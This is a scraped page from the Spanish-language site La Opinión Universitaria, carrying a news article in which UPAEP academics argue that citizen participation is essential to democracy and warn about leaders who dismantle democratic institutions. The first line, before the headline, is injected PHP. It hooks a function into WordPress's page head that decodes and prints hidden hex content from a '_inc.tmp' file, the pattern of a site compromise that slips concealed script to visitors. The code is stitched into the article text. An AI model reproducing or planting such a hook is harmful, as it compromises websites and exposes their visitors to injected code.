if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } La participación ciudadana es fundamental para la vida democrática del país – La Opinión Universitaria La Opinión Universitaria
Menu

La participación ciudadana es fundamental para la vida democrática del país

Es un peligro en el mundo actual que muchas estructuras o instituciones democráticas, de pronto se vean amenazadas por personajes o por corrientes que llegan al poder utilizando esas estructuras y después estando en el poder, comienzan a desmontarlas.

La democracia no se debe dar por supuesta entre los ciudadanos de un país. La democracia como tipo de régimen político y como forma de dominación política tiene muy pocos años, fuera del caso extraordinario de Atenas en la época de Pericles, fuera de eso, la humanidad no ha vivido regímenes democráticos, es algo nuevo en los últimos 400 años a la fecha.

Es un peligro en el mundo actual que muchas estructuras o instituciones democráticas, de pronto se vean amenazadas por personajes o por corrientes que llegan al poder utilizando esas estructuras y después estando en el poder, comienzan a desmontarlas, expresó Herminio Sánchez de la Barquera y Arroyo, Decano de Ciencias Sociales de la UPAEP.

A mucha gente le es difícil acoplarse a las exigencias de un régimen democrático porque no solamente es nuevo el concepto de democracia en la humanidad, sino también porque es una forma de dominación política que exige mucho, acotó el académico.

Agregó que la democracia exige mucho de la participación de todos, de gobernantes y gobernados, por eso muchas veces llega a ser complicada y difícil, “algunos la califican como que no es la gran cosa, pero podemos decir que es lo mejor que tenemos. Es como la gente que se queja de su trabajo, lo peor para ellas, sería quedarse sin ese trabajo”.

Sánchez de la Barquera refirió que la democracia es fundamental para garantizar muchas cosas que otros tipos de regímenes políticos no pueden garantizar como es el caso del respeto a los derechos humanos, por señalar un tema.

Dijo que en los tiempos actuales, es importante la participación de todos los miembros de la sociedad para responder a ese llamado de la democracia, para consolidarla, hacer valer sus principios y consolidar también sus valores, de depositar la soberanía de un país en sus ciudadanos, en el pueblo y hacer valer la igualdad jurídica de todos, la protección del individuo ante los excesos del estado; y esto se logra a través de contar con instituciones que sirvan para dicho fin.

Apuntó que es un peligro en el mundo actual que muchas estructuras o instituciones democráticas, de pronto se vean amenazadas por personajes, por corrientes que llegan al poder utilizando esas estructuras y después estando en el poder, comienzan a desmontarlas, algo similar sucedió con Donald Trump en los Estados Unidos; con Viktor Orbán en Hungría o Jair Bolsonaro en Brasil; y también estamos viendo en México que hay una lucha por ir desmontando esa estructura institucional democrática que sirve entre otras cosas, para defendernos de los excesos del estado o de los gobiernos y que representa un peligro del cual debemos estar conscientes como ciudadanos todos los mexicanos.

Sánchez de la Barquera enfatizó que las oportunidades que tienen las personas de participar en la vida democrática de su país están democratizadas fundamentalmente, “hay un sufragio universal, oportunidades iguales para todos de participar, hay un público ilustrado, porque los electores deben ejercer un voto informado, un voto consciente y no solo votar por emociones aun cuando esto pueda resultar difícil. Hay formas garantizadas de participar en la vida política. La democracia es un tipo de régimen que necesita que lo cuidemos con nuestra participación tanto de ciudadanos como gobernantes”.

Por su parte, Juan Pablo Aranda Vargas, investigador de la Facultad de Ciencia Política y Gobierno de la UPAEP, mencionó que el gran problema de México es que los ciudadanos no tienen una cultura democrática de amplio calado.

Tweets recientes